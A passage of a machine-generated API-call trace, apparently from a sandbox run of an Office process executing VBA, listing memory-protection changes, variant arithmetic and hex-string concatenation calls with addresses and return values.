1 [0102.479] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112b0c46, cbMultiByte=34, lpWideCharStr=0x197274, cchWideChar=35 | out: lpWideCharStr="_B_var_–————–––––———–————–———–——–") returned 34 [0102.480] _mbscpy_s (in: _Dst=0x1972dc, _DstSizeInBytes=0x1b, _Src=0x112b07ba | out: _Dst=0x1972dc) returned 0x0 [0102.480] CRetailMalloc_Free () returned 0x1 [0102.480] memcpy (in: _Dst=0xcb65290, _Src=0xcb65290, _Size=0xc | out: _Dst=0xcb65290) returned 0xcb65290 [0102.480] memcpy (in: _Dst=0xcb65188, _Src=0x1973e8, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0102.480] memcpy (in: _Dst=0xcb6518c, _Src=0x1973e8, _Size=0x4 | out: _Dst=0xcb6518c) returned 0xcb6518c [0102.480] memcpy (in: _Dst=0xcb65188, _Src=0x197254, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0102.480] memcpy (in: _Dst=0xcb65188, _Src=0x197254, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0102.480] memcpy (in: _Dst=0xcb65188, _Src=0x1973e8, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0102.480] memcpy (in: _Dst=0xcb65188, _Src=0x1973e8, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0102.480] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x6936ded0, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0102.480] memcpy (in: _Dst=0xca3d330, _Src=0x197484, _Size=0x18 | out: _Dst=0xca3d330) returned 0xca3d330 [0102.481] CRetailMalloc_Realloc () returned 0xca3d2b8 [0102.481] CRetailMalloc_Free () returned 0x1 [0102.481] GetCurrentProcess () returned 0xffffffff [0102.481] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f789c, dwSize=0x14) returned 1 [0102.481] VirtualProtect (in: lpAddress=0xf5f789c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0102.482] GetCurrentProcess () returned 0xffffffff [0102.482] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f789d, dwSize=0x2) returned 1 [0102.482] GetCurrentProcess () returned 0xffffffff [0102.482] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78bc, dwSize=0x14) returned 1 [0102.482] VirtualProtect (in: lpAddress=0xf5f78bc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0102.482] GetCurrentProcess () returned 0xffffffff [0102.482] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78bd, dwSize=0x2) returned 1 [0102.482] GetCurrentProcess () returned 0xffffffff [0102.482] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78dc, dwSize=0x14) returned 1 [0102.482] VirtualProtect (in: lpAddress=0xf5f78dc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0102.483] GetCurrentProcess () returned 0xffffffff [0102.483] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78dd, dwSize=0x2) returned 1 [0102.483] GetCurrentProcess () returned 0xffffffff [0102.483] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78fc, dwSize=0x14) returned 1 [0102.483] VirtualProtect (in: lpAddress=0xf5f78fc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0102.484] GetCurrentProcess () returned 0xffffffff [0102.484] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78fd, dwSize=0x2) returned 1 [0102.484] GetCurrentProcess () returned 0xffffffff [0102.484] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f791c, dwSize=0x14) returned 1 [0102.484] VirtualProtect (in: lpAddress=0xf5f791c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0102.484] GetCurrentProcess () returned 0xffffffff [0102.484] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f791d, dwSize=0x2) returned 1 [0102.484] GetCurrentProcess () returned 0xffffffff [0102.484] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f793c, dwSize=0x14) returned 1 [0102.484] VirtualProtect (in: lpAddress=0xf5f793c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0102.485] GetCurrentProcess () returned 0xffffffff [0102.485] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f793d, dwSize=0x2) returned 1 [0102.485] GetCurrentProcess () returned 0xffffffff [0102.485] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f795c, dwSize=0x14) returned 1 [0102.485] VirtualProtect (in: lpAddress=0xf5f795c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0102.486] GetCurrentProcess () returned 0xffffffff [0102.486] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f795d, dwSize=0x2) returned 1 [0102.486] GetCurrentProcess () returned 0xffffffff [0102.486] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f797c, dwSize=0x14) returned 1 [0102.486] VirtualProtect (in: lpAddress=0xf5f797c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0102.486] GetCurrentProcess () returned 0xffffffff [0102.486] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f797d, dwSize=0x2) returned 1 [0102.486] GetCurrentProcess () returned 0xffffffff [0102.487] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f799c, dwSize=0x14) returned 1 [0102.487] VirtualProtect (in: lpAddress=0xf5f799c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0102.487] GetCurrentProcess () returned 0xffffffff [0102.487] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f799d, dwSize=0x2) returned 1 [0102.487] GetCurrentProcess () returned 0xffffffff [0102.487] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79bc, dwSize=0x14) returned 1 [0102.487] VirtualProtect (in: lpAddress=0xf5f79bc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0102.488] GetCurrentProcess () returned 0xffffffff [0102.488] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79bd, dwSize=0x2) returned 1 [0102.488] GetCurrentProcess () returned 0xffffffff [0102.488] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79dc, dwSize=0x14) returned 1 [0102.488] VirtualProtect (in: lpAddress=0xf5f79dc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0102.488] GetCurrentProcess () returned 0xffffffff [0102.488] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79dd, dwSize=0x2) returned 1 [0102.488] GetCurrentProcess () returned 0xffffffff [0102.489] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79fc, dwSize=0x14) returned 1 [0102.489] VirtualProtect (in: lpAddress=0xf5f79fc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0102.489] GetCurrentProcess () returned 0xffffffff [0102.489] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79fd, dwSize=0x2) returned 1 [0102.489] GetCurrentProcess () returned 0xffffffff [0102.489] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737248, dwSize=0x14) returned 1 [0102.489] VirtualProtect (in: lpAddress=0xc737248, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0102.490] GetCurrentProcess () returned 0xffffffff [0102.490] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737249, dwSize=0x2) returned 1 [0102.490] GetCurrentProcess () returned 0xffffffff [0102.490] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737268, dwSize=0x14) returned 1 [0102.490] VirtualProtect (in: lpAddress=0xc737268, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0102.491] GetCurrentProcess () returned 0xffffffff [0102.491] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737269, dwSize=0x2) returned 1 [0102.491] GetCurrentProcess () returned 0xffffffff [0102.491] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737288, dwSize=0x14) returned 1 [0102.491] VirtualProtect (in: lpAddress=0xc737288, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0102.491] GetCurrentProcess () returned 0xffffffff [0102.491] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737289, dwSize=0x2) returned 1 [0102.491] GetCurrentProcess () returned 0xffffffff [0102.491] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372a8, dwSize=0x14) returned 1 [0102.491] VirtualProtect (in: lpAddress=0xc7372a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0102.492] GetCurrentProcess () returned 0xffffffff [0102.492] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372a9, dwSize=0x2) returned 1 [0102.492] GetCurrentProcess () returned 0xffffffff [0102.492] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372c8, dwSize=0x14) returned 1 [0102.492] VirtualProtect (in: lpAddress=0xc7372c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0102.493] GetCurrentProcess () returned 0xffffffff [0102.493] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372c9, dwSize=0x2) returned 1 [0102.493] GetCurrentProcess () returned 0xffffffff [0102.493] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372e8, dwSize=0x14) returned 1 [0102.493] VirtualProtect (in: lpAddress=0xc7372e8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0102.494] GetCurrentProcess () returned 0xffffffff [0102.494] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372e9, dwSize=0x2) returned 1 [0102.494] GetCurrentProcess () returned 0xffffffff [0102.494] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737308, dwSize=0x14) returned 1 [0102.494] VirtualProtect (in: lpAddress=0xc737308, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0102.495] GetCurrentProcess () returned 0xffffffff [0102.495] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737309, dwSize=0x2) returned 1 [0102.495] GetCurrentProcess () returned 0xffffffff [0102.495] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737328, dwSize=0x14) returned 1 [0102.495] VirtualProtect (in: lpAddress=0xc737328, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0102.495] GetCurrentProcess () returned 0xffffffff [0102.496] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737329, dwSize=0x2) returned 1 [0102.496] GetCurrentProcess () returned 0xffffffff [0102.496] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737348, dwSize=0x14) returned 1 [0102.496] VirtualProtect (in: lpAddress=0xc737348, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0102.496] GetCurrentProcess () returned 0xffffffff [0102.496] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737349, dwSize=0x2) returned 1 [0102.496] GetCurrentProcess () returned 0xffffffff [0102.496] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737368, dwSize=0x14) returned 1 [0102.496] VirtualProtect (in: lpAddress=0xc737368, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0102.497] GetCurrentProcess () returned 0xffffffff [0102.497] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737369, dwSize=0x2) returned 1 [0102.497] GetCurrentProcess () returned 0xffffffff [0102.497] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737388, dwSize=0x14) returned 1 [0102.497] VirtualProtect (in: lpAddress=0xc737388, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0102.498] GetCurrentProcess () returned 0xffffffff [0102.498] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737389, dwSize=0x2) returned 1 [0102.498] GetCurrentProcess () returned 0xffffffff [0102.498] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373a8, dwSize=0x14) returned 1 [0102.498] VirtualProtect (in: lpAddress=0xc7373a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0102.499] GetCurrentProcess () returned 0xffffffff [0102.499] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373a9, dwSize=0x2) returned 1 [0102.499] GetCurrentProcess () returned 0xffffffff [0102.499] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373c8, dwSize=0x14) returned 1 [0102.499] VirtualProtect (in: lpAddress=0xc7373c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0102.499] GetCurrentProcess () returned 0xffffffff [0102.499] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373c9, dwSize=0x2) returned 1 [0102.500] GetCurrentProcess () returned 0xffffffff [0102.500] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373e8, dwSize=0x14) returned 1 [0102.500] VirtualProtect (in: lpAddress=0xc7373e8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0102.500] GetCurrentProcess () returned 0xffffffff [0102.500] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373e9, dwSize=0x2) returned 1 [0102.500] GetCurrentProcess () returned 0xffffffff [0102.500] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737408, dwSize=0x14) returned 1 [0102.500] VirtualProtect (in: lpAddress=0xc737408, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0102.501] GetCurrentProcess () returned 0xffffffff [0102.501] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737409, dwSize=0x2) returned 1 [0102.501] GetCurrentProcess () returned 0xffffffff [0102.568] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737428, dwSize=0x14) returned 1 [0102.568] VirtualProtect (in: lpAddress=0xc737428, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0102.569] GetCurrentProcess () returned 0xffffffff [0102.569] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737429, dwSize=0x2) returned 1 [0102.569] GetCurrentProcess () returned 0xffffffff [0102.569] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4e78, dwSize=0x14) returned 1 [0102.569] VirtualProtect (in: lpAddress=0xc7c4e78, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0102.570] GetCurrentProcess () returned 0xffffffff [0102.570] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4e79, dwSize=0x2) returned 1 [0102.570] GetCurrentProcess () returned 0xffffffff [0102.570] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4e98, dwSize=0x14) returned 1 [0102.570] VirtualProtect (in: lpAddress=0xc7c4e98, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0102.571] GetCurrentProcess () returned 0xffffffff [0102.571] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4e99, dwSize=0x2) returned 1 [0102.571] GetCurrentProcess () returned 0xffffffff [0102.571] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4eb8, dwSize=0x14) returned 1 [0102.571] VirtualProtect (in: lpAddress=0xc7c4eb8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0102.571] GetCurrentProcess () returned 0xffffffff [0102.571] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4eb9, dwSize=0x2) returned 1 [0102.571] SetErrorMode (uMode=0x8001) returned 0x8001 [0102.571] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0102.571] LoadLibraryA (lpLibFileName="VBE7.DLL") returned 0x69130000 [0102.572] SetErrorMode (uMode=0x8001) returned 0x8001 [0102.572] GetProcAddress (hModule=0x69130000, lpProcName=0x234) returned 0x6930b15f [0102.573] GetAsyncKeyState (vKey=3) returned 0 [0102.573] GetAsyncKeyState (vKey=3) returned 0 [0102.574] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.574] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.574] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.574] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.574] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.574] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.574] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.574] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0102.575] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.575] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.575] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.575] VarBstrCat (in: bstrLeft="&H", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.575] VarBstrCat (in: bstrLeft="&H6", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.575] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.575] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.575] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.575] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.575] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.575] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.575] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.575] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0102.575] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.576] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.576] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.576] VarBstrCat (in: bstrLeft="&H", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.576] VarBstrCat (in: bstrLeft="&H6", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.576] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.576] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.576] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.576] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.576] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.576] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.576] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.576] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0102.576] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.576] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.576] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.576] VarBstrCat (in: bstrLeft="&H", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.577] VarBstrCat (in: bstrLeft="&H6", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.577] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.577] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.577] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.577] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.577] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.577] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.577] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.577] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0102.577] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.577] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.577] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.577] VarBstrCat (in: bstrLeft="&H", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.577] VarBstrCat (in: bstrLeft="&H6", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.577] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.577] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.577] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.577] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.577] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.577] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.577] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.577] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0102.578] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.578] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.578] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.578] VarBstrCat (in: bstrLeft="&H", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.578] VarBstrCat (in: bstrLeft="&H6", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.578] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.578] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.578] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.578] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.578] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.578] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.578] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.578] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0102.578] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.578] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.578] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.579] VarBstrCat (in: bstrLeft="&H", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.579] VarBstrCat (in: bstrLeft="&H6", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.579] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.579] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.579] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.579] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.579] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.579] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.579] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.579] VarCmp 